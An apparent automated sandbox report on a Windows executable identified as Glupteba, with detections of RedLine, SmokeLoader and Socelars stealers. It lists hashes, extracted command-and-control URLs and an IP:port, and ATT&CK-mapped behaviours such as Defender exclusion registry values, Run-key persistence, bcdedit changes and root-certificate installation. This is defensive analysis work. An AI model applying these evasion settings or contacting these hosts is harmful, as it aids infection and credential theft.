glupteba | 7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d

Analysis

max time kernel
4294211s
max time network
154s
platform
windows7_x64
resource
win7-20220311-en
submitted
12-03-2022 20:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
Size

9.0MB
MD5

9a1b73d4b47adf1c2e688d96b9321d7b
SHA1

45d2cd3b986424ceac0e2f27297d30937dd463ab
SHA256

7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d
SHA512

7451be683d06ab8c297e5de1d5786e63fb3799ce141a28fb3bd3921a72adb3331804da4f095aedfea012c02b4e83994ea58bfea14d70132c023da2adf782e4c6

Score

10^/10

glupteba metasploit redline smokeloader socelars upd backdoor discovery dropper evasion infostealer loader persistence spyware stealer trojan upx

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

redline

Botnet

upd

193.56.146.78:51487

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 4 IoCs

Processes:

resource	yara_rule
behavioral1/memory/876-160-0x0000000005190000-0x0000000005AB6000-memory.dmp	family_glupteba
behavioral1/memory/876-161-0x0000000000400000-0x00000000030E7000-memory.dmp	family_glupteba
behavioral1/memory/1656-162-0x0000000000400000-0x00000000030E7000-memory.dmp	family_glupteba
behavioral1/memory/432-173-0x0000000000400000-0x00000000030E7000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rUNdlL32.eXe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 988 1372 rUNdlL32.eXe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	988	1372	rUNdlL32.eXe

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1988-127-0x0000000002E10000-0x0000000002E34000-memory.dmp	family_redline
behavioral1/memory/1988-132-0x0000000006F50000-0x0000000006F72000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 5 IoCs

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars

Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112

Modifies boot configuration data using bcdedit 14 IoCs

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid	process
1432	bcdedit.exe
904	bcdedit.exe
1772	bcdedit.exe
804	bcdedit.exe
1432	bcdedit.exe
1608	bcdedit.exe
804	bcdedit.exe
1432	bcdedit.exe
1608	bcdedit.exe
804	bcdedit.exe
1432	bcdedit.exe
1608	bcdedit.exe
1772	bcdedit.exe
1608	bcdedit.exe

Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

csrss.exe

description ioc process

File created C:\Windows\system32\drivers\Winmon.sys csrss.exe

description	ioc	process
File created	C:\Windows\system32\drivers\Winmon.sys	csrss.exe

Executes dropped EXE 18 IoCs

Processes:

SoCleanInst.exemd9_1sjm.exeFolder.exeInfo.exeUpdbdate.exeFile.execonhost.exeInstall.exepub2.exeFiles.exejfiag3g_gg.exeschtasks.exeInfo.execsrss.exepatch.exe2QMf4xkTtan2vyAbQepUtkGc.exedsefix.exeinjector.exe

pid	process
1464	SoCleanInst.exe
1152	md9_1sjm.exe
1392	Folder.exe
876	Info.exe
1988	Updbdate.exe
288	File.exe
1184	conhost.exe
964	Install.exe
364	pub2.exe
2040	Files.exe
1992	jfiag3g_gg.exe
1832	schtasks.exe
1656	Info.exe
432	csrss.exe
1076	patch.exe
904	2QMf4xkTtan2vyAbQepUtkGc.exe
1540	dsefix.exe
2072	injector.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command-Line Interface
T1059

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

File.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Control Panel\International\Geo\Nation File.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Control Panel\International\Geo\Nation	File.exe

Loads dropped DLL 58 IoCs

Processes:

7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exeFolder.exeFiles.exeInfo.exepatch.exeFile.execsrss.exe

pid	process
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1392	Folder.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
2040	Files.exe
2040	Files.exe
2040	Files.exe
2040	Files.exe
1656	Info.exe
1656	Info.exe
888
1076	patch.exe
1076	patch.exe
1076	patch.exe
1076	patch.exe
1076	patch.exe
1076	patch.exe
1076	patch.exe
1076	patch.exe
288	File.exe
432	csrss.exe
432	csrss.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 10 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

Info.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	Info.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Info.exe = "0"	Info.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"	Info.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	Info.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	Info.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\LittleLeaf = "0"	Info.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	Info.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0"	Info.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	Info.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	Info.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Files.exeInfo.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Windows\CurrentVersion\Run\LittleLeaf = "\"C:\\Windows\\rss\\csrss.exe\""	Info.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

89 ipinfo.io
90 ipinfo.io
12 ip-api.com
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

flow	ioc
89	ipinfo.io
90	ipinfo.io
12	ip-api.com

Drops file in Windows directory 3 IoCs

Processes:

Info.exemakecab.exe

description	ioc	process
File opened for modification	C:\Windows\rss	Info.exe
File created	C:\Windows\rss\csrss.exe	Info.exe
File created	C:\Windows\Logs\CBS\CbsPersist_20220312203318.cab	makecab.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1832 schtasks.exe
556 schtasks.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

904 taskkill.exe

pid	process
1832	schtasks.exe
556	schtasks.exe

pid	process
904	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

Info.exenetsh.execsrss.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	Info.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client"	netsh.exe

Modifies system certificate store 2 TTPs 10 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

patch.execsrss.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bf